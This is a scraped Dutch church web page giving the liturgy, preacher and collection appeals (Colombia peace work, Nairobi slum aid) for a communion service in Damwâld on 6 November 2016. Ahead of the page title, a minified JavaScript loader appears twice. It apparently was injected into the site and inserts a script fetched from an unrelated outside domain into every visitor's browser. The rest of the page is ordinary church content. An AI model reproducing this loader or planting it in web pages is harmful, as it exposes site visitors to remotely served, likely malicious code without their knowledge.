;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 6 november 2016 9:30 uur - PKN Damwâld
zondag 6 november 2016
09:30 uur

Kerkdienst zondag 6 november 2016 9:30 uur

Thema: Viering Heilig Avondmaal

vg_-01

Informatie

Voorganger:Ds. G. Timmer
Organist:Ivo van Hijum
Thema:Viering Heilig Avondmaal
Liturgie
Lied voor de dienst: ELB 37: 1, 5 en 8
Welkom en mededelingen
Intochtslied: Gezang 87: 1, 4 en 5
Stil gebed, bemoediging en groet
Loflied: Psalm 27: 1 en 2
Apostolische Geloofsbelijdenis
We zingen: Psalm 27: 7
Gebed Gebed om de opening van het Woord
We lezen: 2 Korinthe 4: 7-18
Collecte
We zingen: ELB 112: 1, 5, 6 en 7
Verkondiging: “Leven in de dood”
Gezang 217: 1, 2, 3 en 4
Voorbereiding op de viering van het Heilig Avondmaal
- Beantwoording van de 4 vragen door hen die willen aangaan
- Lezing van het Avondmaalsformulier: de betekenis van het avondmaal.
- Gebed
We zingen: Psalm 23: 1 en 2
Viering van het avondmaal
We zingen: ELB 371: 1 en 2
Dankgebed
We zingen: ELB 371: 3 en 4
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: De Ikker Hearewei 1, Damwâld
Collecte informatie
Eerste collecte: Najaarszendingsweek

Werken aan vrede en verzoening in het door geweld verscheurde Colombia
De bevolking in Colombia snakt naar vrede en rust. Al zestig jaar zitten mensen klem tussen de
strijdende partijen: guerrillalegers, de overheid, paramilitairen en de drugsmaffia. De Mennonieten-kerk in Colombia (genaamd IMCOL) heeft het project ‘Geloven in verzoening’ opgezet. Inge Landman werkt hier als uitgezonden medewerker namens Kerk in Actie aan mee. Samen met medewerkers van IMCOL bezoekt Inge groepen mensen die dagelijks te maken hebben met angst en onrecht. Hoe denken zij over vrede en verzoening? Samen bestuderen ze bijbelteksten rond thema’s als gerechtigheid, waarheid en vergeving. Aan de hand van de methode ‘Bijbellezen met andere ogen’ bespreken ze wat deze teksten te betekenen hebben in het dagelijks leven. Op die manier komen er verhalen naar boven: over wat mensen meemaken, over relaties en over de maatschappij, waarin onderdrukking en geweld zo’n grote rol spelen. Door hierover te praten, kunnen mensen een duidelijk standpunt bepalen. Veel maatschappelijke organisaties in Colombia pleiten bijvoorbeeld voor het bestraffen van misdaden. Maar in een van de groepen van het IMCOL-project vinden de mensen straf niet het belangrijkst. Zij willen dat de daders hun fouten erkennen, en dat ze eindelijk de eigendoms-rechten van hun land krijgen. Inge deelt de verhalen die ze hoort met betrokken kerken in Nederland.

Tweede collecte: Kerk
Uitganscollecte: Tear

Hulp aan de inwoners van de sloppenwijk van Nairobi
De eerste Christenen verkochten hun bezittingen en verdeelden de opbrengst onder de armen. Geloven en praktische hulp gingen hand in hand. Een krachtig getuigenis dat kerken 2000 jaar later nog steeds overal ter wereld uitdragen. Eén van deze kerken is de Redeemed Gospel Church in Mathare Valley, een sloppenwijk van Nairobi (Kenia). Hier wonen zo'n 600.000 mensen in kleine hutjes dicht op elkaar. De wijk is berucht vanwege de armoede, hoge kindersterfte en vele aidspatiënten. In deze moeilijke omstandigheden belanden veel inwoners in de prostitutie of criminaliteit. Met steun van Tear werkt de Redeemed Gospel Church hard om zoveel mogelijk mensen een andere, betere toekomst te bieden. Zo wordt voorlichting gegeven over hiv en aids, krijgen ondervoede kinderen een maaltijd en worden buurtgenoten via spaargroepen geholpen om financieel op eigen benen te staan.